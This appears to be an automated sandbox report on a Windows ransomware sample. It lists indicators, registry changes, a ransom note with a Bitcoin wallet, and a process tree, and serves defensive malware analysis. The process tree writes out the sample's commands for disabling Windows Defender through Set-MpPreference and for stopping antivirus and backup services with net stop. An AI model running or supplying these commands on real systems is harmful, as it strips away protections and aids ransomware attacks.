58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f

Resubmissions

05-09-2023 10:11

230905-l7zrzseh58 10

26-07-2021 12:40

210726-vs5ps9f646 10

Analysis

max time kernel
145s
max time network
154s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
05-09-2023 10:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Size

82KB
MD5

e01e11dca5e8b08fc8231b1cb6e2048c
SHA1

4983d07f004436caa3f10b38adacbba6a4ede01a
SHA256

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
SHA512

298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
SSDEEP

1536:PcW4lAJGGnzjoih/NDh/NDuk+XkGAK/hztXcag+PlbBfkWIyvZrw281r5XsmCZEe:UWNGszjoih/NDh/NDuk+XkGAK/hztXcQ

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/4916-0-0x0000000000620000-0x000000000063A000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Drops startup file 1 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1056 sc.exe
96 sc.exe
5104 sc.exe
3924 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1056	sc.exe
96	sc.exe
5104	sc.exe
3924	sc.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
2628	vssadmin.exe
5076	vssadmin.exe
4112	vssadmin.exe
2072	vssadmin.exe
4880	vssadmin.exe
2840	vssadmin.exe
4716	vssadmin.exe
2932	vssadmin.exe
2484	vssadmin.exe
4704	vssadmin.exe
2100	vssadmin.exe
1376	vssadmin.exe
5024	vssadmin.exe
4740	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3744 taskkill.exe
2664 taskkill.exe
3576 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5944 PING.EXE

pid	process
3744	taskkill.exe
2664	taskkill.exe
3576	taskkill.exe

pid	process
5944	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exe

pid	process
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4404	powershell.exe
4404	powershell.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exepowershell.exepowershell.exenet.exepowershell.exeConhost.exeConhost.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeIncreaseQuotaPrivilege	4404	powershell.exe
Token: SeSecurityPrivilege	4404	powershell.exe
Token: SeTakeOwnershipPrivilege	4404	powershell.exe
Token: SeLoadDriverPrivilege	4404	powershell.exe
Token: SeSystemProfilePrivilege	4404	powershell.exe
Token: SeSystemtimePrivilege	4404	powershell.exe
Token: SeProfSingleProcessPrivilege	4404	powershell.exe
Token: SeIncBasePriorityPrivilege	4404	powershell.exe
Token: SeCreatePagefilePrivilege	4404	powershell.exe
Token: SeBackupPrivilege	4404	powershell.exe
Token: SeRestorePrivilege	4404	powershell.exe
Token: SeShutdownPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeSystemEnvironmentPrivilege	4404	powershell.exe
Token: SeRemoteShutdownPrivilege	4404	powershell.exe
Token: SeUndockPrivilege	4404	powershell.exe
Token: SeManageVolumePrivilege	4404	powershell.exe
Token: 33	4404	powershell.exe
Token: 34	4404	powershell.exe
Token: 35	4404	powershell.exe
Token: 36	4404	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2832	net.exe
Token: SeDebugPrivilege	3936	powershell.exe
Token: SeDebugPrivilege	436	Conhost.exe
Token: SeDebugPrivilege	5092	Conhost.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	316	powershell.exe
Token: SeIncreaseQuotaPrivilege	3936	powershell.exe
Token: SeSecurityPrivilege	3936	powershell.exe
Token: SeTakeOwnershipPrivilege	3936	powershell.exe
Token: SeLoadDriverPrivilege	3936	powershell.exe
Token: SeSystemProfilePrivilege	3936	powershell.exe
Token: SeSystemtimePrivilege	3936	powershell.exe
Token: SeProfSingleProcessPrivilege	3936	powershell.exe
Token: SeIncBasePriorityPrivilege	3936	powershell.exe
Token: SeCreatePagefilePrivilege	3936	powershell.exe
Token: SeBackupPrivilege	3936	powershell.exe
Token: SeRestorePrivilege	3936	powershell.exe
Token: SeShutdownPrivilege	3936	powershell.exe
Token: SeDebugPrivilege	3936	powershell.exe
Token: SeSystemEnvironmentPrivilege	3936	powershell.exe
Token: SeRemoteShutdownPrivilege	3936	powershell.exe
Token: SeUndockPrivilege	3936	powershell.exe
Token: SeManageVolumePrivilege	3936	powershell.exe
Token: 33	3936	powershell.exe
Token: 34	3936	powershell.exe
Token: 35	3936	powershell.exe
Token: 36	3936	powershell.exe
Token: SeIncreaseQuotaPrivilege	2832	net.exe
Token: SeSecurityPrivilege	2832	net.exe
Token: SeTakeOwnershipPrivilege	2832	net.exe
Token: SeLoadDriverPrivilege	2832	net.exe
Token: SeSystemProfilePrivilege	2832	net.exe
Token: SeSystemtimePrivilege	2832	net.exe
Token: SeProfSingleProcessPrivilege	2832	net.exe
Token: SeIncBasePriorityPrivilege	2832	net.exe
Token: SeCreatePagefilePrivilege	2832	net.exe
Token: SeBackupPrivilege	2832	net.exe
Token: SeRestorePrivilege	2832	net.exe
Token: SeShutdownPrivilege	2832	net.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

pid	process
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

pid	process
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

description	pid	process	target process
PID 4916 wrote to memory of 4404	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 4404	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 2688	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 2688	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 2832	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2832	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 3936	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 3936	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 436	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	Conhost.exe
PID 4916 wrote to memory of 436	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	Conhost.exe
PID 4916 wrote to memory of 2200	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 2200	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 5092	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	Conhost.exe
PID 4916 wrote to memory of 5092	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	Conhost.exe
PID 4916 wrote to memory of 316	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 316	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 2852	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 2852	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 2512	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 2512	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 988	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 988	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 3164	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 3164	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 4812	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 4812	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	powershell.exe
PID 4916 wrote to memory of 4060	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4060	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 3652	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 3652	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4152	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4152	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2128	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2128	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4116	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4116	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 3360	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 3360	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 5000	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 5000	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4892	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4892	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2016	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2016	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2832	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2832	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2740	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2740	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 3736	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 3736	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4440	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4440	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4148	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4148	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4708	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4708	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4040	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4040	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2516	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 2516	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4332	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 4332	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 1252	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe
PID 4916 wrote to memory of 1252	4916	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  PID:2832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  PID:436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  PID:5092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:2512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:3164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:5280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5752
